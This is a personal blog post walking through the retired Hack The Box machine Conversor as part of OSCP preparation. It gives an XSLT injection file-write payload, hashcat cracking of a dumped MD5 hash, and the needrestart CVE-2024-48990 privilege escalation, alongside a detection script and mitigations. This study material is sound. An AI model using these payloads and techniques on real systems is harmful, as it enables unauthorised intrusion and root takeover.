It’s May 24th. The last time I touched my OSCP prep was May 8th. Sixteen days lost, first to a brutal exam week, then to whatever virus knocked me flat for a week.

What I did today

Four HTB Academy Footprinting modules: SMTP, IMAP/POP3, SNMP, and MySQL. Then I rooted Conversor on Hack The Box, an easy retired machine that turned out to be a fun XSLT injection foothold into a needrestart CVE-2024-48990 privesc.

Eight productive hours after sixteen days off.

What stuck

All of the simple enumeration and privesc stuff I learned early on stuck, hard. I had a foothold within 30 minutes just based on CVEs and good enumeration, and root within an hour and 40 minutes.

The Conversor box

Recon and foothold

Initial nmap enumeration showed port 80 open, so I went straight to the front-end. I registered a new user to see what was behind the login wall and found an XML/XSLT upload page that “beautified Nmap scans.” I pretty much immediately googled XSLT Injection on intuition.

The payload I used was based on ex-cal1bur’s XSLT-Injection reverse shell PoC.

The ptswarm:document element is an extension element rather than standard XSLT 1.0, and the prefix is arbitrary: what the processor acts on is the namespace the prefix is bound to. Published payloads of this shape bind it to the EXSLT common namespace, http://exslt.org/common, whose document element libxslt implements; it takes an href attribute and writes the element's body to that path while the transform runs, with whatever privileges the web app has. I dropped a Python file into the application’s scripts directory, and the next time the app’s processing chain ran it I caught a reverse shell on port 8080.
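As an added example (mine, not part of the original post or of the PoC it cites), here is a constructed stylesheet in the shape of that file-write payload next to a stdlib-only Python screen for the constructs that let untrusted XSLT touch the filesystem or network. The namespace set, the /opt/app/scripts path, the sample stylesheets and the function names are my assumptions, not anything from the box.

```python
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"

# Extension namespaces whose "document" element writes a file in the
# processors that implement them (EXSLT common in libxslt; Xalan and Saxon
# have their own). Assumed set for this screen, not an exhaustive list.
FILE_WRITE_NS = {
    "http://exslt.org/common",
    "http://xml.apache.org/xalan",
    "http://xml.apache.org/xslt",
    "http://icl.com/saxon",
}

# Constructed payload: the prefix is arbitrary, the namespace binding is what
# libxslt acts on. The target path is hypothetical.
PAYLOAD = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:ptswarm="http://exslt.org/common"
    extension-element-prefixes="ptswarm">
  <xsl:template match="/">
    <ptswarm:document href="/opt/app/scripts/dropped.py" method="text">
      <xsl:text>print("written by the transform")</xsl:text>
    </ptswarm:document>
  </xsl:template>
</xsl:stylesheet>
"""

# Constructed benign stylesheet of the kind an "Nmap beautifier" would expect.
BENIGN = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:output method="html"/>
  <xsl:template match="/nmaprun">
    <ul>
      <xsl:for-each select="host">
        <li><xsl:value-of select="address/@addr"/></li>
      </xsl:for-each>
    </ul>
  </xsl:template>
</xsl:stylesheet>
"""


def split_tag(tag):
    """ElementTree spells namespaced tags as '{uri}local'."""
    if tag.startswith("{"):
        uri, local = tag[1:].split("}", 1)
        return uri, local
    return "", tag


def find_dangerous(xslt_text):
    """Return findings for constructs that reach outside the transform.
    An empty list means nothing was flagged, not that the stylesheet is safe."""
    root = ET.fromstring(xslt_text)
    findings = []
    prefixes = root.get("extension-element-prefixes")
    if prefixes:
        findings.append("declares extension-element-prefixes=%r" % prefixes)
    for el in root.iter():
        uri, local = split_tag(el.tag)
        if local == "document" and uri in FILE_WRITE_NS:
            findings.append("file write via {%s}document href=%r" % (uri, el.get("href")))
        elif uri == XSL_NS and local == "result-document":
            findings.append("file write via xsl:result-document href=%r" % el.get("href"))
        elif uri == XSL_NS and local in ("include", "import"):
            findings.append("xsl:%s loads href=%r" % (local, el.get("href")))
        # XPath functions that read local files or URLs.
        for attr in ("select", "test", "match"):
            expr = el.get(attr, "")
            if "document(" in expr or "unparsed-text(" in expr:
                findings.append("%s=%r reads external content" % (attr, expr))
    return findings


if __name__ == "__main__":
    print("benign:", find_dangerous(BENIGN))
    print("payload:", find_dangerous(PAYLOAD))
```

The screen is a blocklist, so treat it as a tripwire rather than a fix: the real mitigation is not to run user-supplied stylesheets at all, or, if the app sits on lxml (which wraps libxslt), to construct the transform with access_control set to XSLTAccessControl.DENY_ALL so the document element and the document() function cannot reach the filesystem or network regardless of what the stylesheet declares.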

User flag

With a shell on the box, I went looking through the app source for hardcoded secrets and database files. Found a users.db file in the instance directory and dumped it:

cat users.db

That gave me an MD5 hash for a user named fismathack. Cracked it with hashcat:

hashcat -m 0 fismathack.hash /usr/share/wordlists/rockyou.txt

SSH’d in with the cracked credentials and grabbed user.txt.

Privesc: needrestart CVE-2024-48990

First thing after getting user was sudo -l. needrestart was runnable as NOPASSWD — immediate red flag.

The mechanism

needrestart is an Ubuntu-default tool that scans running processes after package upgrades to work out which ones still map outdated libraries and need restarting. CVE-2024-48990, disclosed by Qualys in November 2024, lives in its interpreter-scanning heuristic: to inspect a running Python process, needrestart launches that process's Python interpreter using environment variables taken from the scanned process, and Python honors the PYTHONPATH it finds there. Because needrestart itself runs as root, any unprivileged local user who keeps a Python process alive with PYTHONPATH pointing at a directory they control gets a module of their choosing loaded, and its code executed, as root the next time needrestart runs.

All needrestart versions before 3.8 are affected, and needrestart is installed by default on Ubuntu Server (since 21.04), where it runs as root from an apt hook after package installs. On real systems the attacker rarely gets a sudo rule like this box's; they plant the module, keep the Python process running, and wait for the next package upgrade to trigger the scan. Patching to 3.8 or later is the fix; where that isn't possible, the mitigation Qualys recommends is to disable the interpreter heuristic by setting $nrconf{interpscan} = 0; in /etc/needrestart/needrestart.conf.
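As an added example (mine, not the post's or the PoC's), here is the mechanism behind the CVE reduced to something you can run unprivileged: a Python interpreter started with an attacker-controlled PYTHONPATH executes code from that directory before the command it was asked to run. I use a sitecustomize.py, which site.py imports from sys.path at startup, as the planted module rather than the one the public PoC shadows, and run the interpreter as "python3 -c pass" to stand in for whatever a scanner like needrestart would invoke; the second run with -I shows what an interpreter that ignores the inherited environment does instead. Paths, file contents and function names are my assumptions.

```python
import os
import subprocess
import sys
import tempfile

# Constructed stand-in for the attacker's module: it only leaves a marker
# recording the uid that imported it. site.py imports "sitecustomize" from
# sys.path at startup, and PYTHONPATH entries sit ahead of the stdlib there.
SITECUSTOMIZE = '''\
import os
with open(os.environ["HIJACK_MARKER"], "w") as fh:
    fh.write(str(getattr(os, "geteuid", lambda: -1)()))
'''


def plant(plant_dir):
    """Drop sitecustomize.py where PYTHONPATH will make it the first hit."""
    path = os.path.join(plant_dir, "sitecustomize.py")
    with open(path, "w") as fh:
        fh.write(SITECUSTOMIZE)
    return path


def interpreter_loaded_planted_module(plant_dir, cwd, marker, isolated):
    """Run a throwaway interpreter ("python3 -c pass") with PYTHONPATH set the
    way a scanned process would have set it. Returns True when the planted
    module ran, i.e. when the marker file appeared."""
    if os.path.exists(marker):
        os.remove(marker)
    argv = [sys.executable]
    if isolated:
        argv.append("-I")   # isolated mode: PYTHON* env vars ignored, no cwd on sys.path
    argv += ["-c", "pass"]  # the command itself does nothing
    env = {
        "PATH": os.environ.get("PATH", ""),
        "PYTHONPATH": plant_dir,   # the attacker-controlled part
        "HIJACK_MARKER": marker,   # only so the stand-in knows where to write
    }
    # cwd is an empty directory, so PYTHONPATH is the only way in.
    subprocess.run(argv, env=env, cwd=cwd, check=True)
    return os.path.exists(marker)


def demo():
    """Returns {'default': True, 'isolated': False} on a normal CPython."""
    with tempfile.TemporaryDirectory() as tmp:
        plant_dir = os.path.join(tmp, "attacker")
        cwd = os.path.join(tmp, "cwd")
        os.mkdir(plant_dir)
        os.mkdir(cwd)
        plant(plant_dir)
        marker = os.path.join(tmp, "marker")
        return {
            "default": interpreter_loaded_planted_module(plant_dir, cwd, marker, isolated=False),
            "isolated": interpreter_loaded_planted_module(plant_dir, cwd, marker, isolated=True),
        }


if __name__ == "__main__":
    print(demo())
```

Run it as yourself and the marker is written with your own uid; the point of the CVE is only that needrestart was the one launching the interpreter, so the same import happened as root. Any privileged tool that execs an interpreter inherited from an untrusted process needs to scrub PYTHON*, RUBYLIB and friends from the environment (or use the interpreter's isolated mode) before doing so.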

Exploitation

Used pentestfunctions’ PoC. No gcc on the target, so I compiled on my own machine and transferred the binary. From there I followed the steps in the PoC’s bash script manually:

# Compiled malicious shared object locally, transferred to target
# Then on target:
python3 exploit.py
sudo needrestart

Ran needrestart as superuser per the sudo permission and dropped into a root shell. Grabbed root.txt.

What’s next?

Tomorrow: more Footprinting modules. Another easy retired box if energy allows. I wanna rebuild the rhythm this week, then start moving into TJnull’s easy tier next week.

Three months to OSCP, six months to graduation. Sixteen days off didn’t change that; it just made today’s session feel earned.

References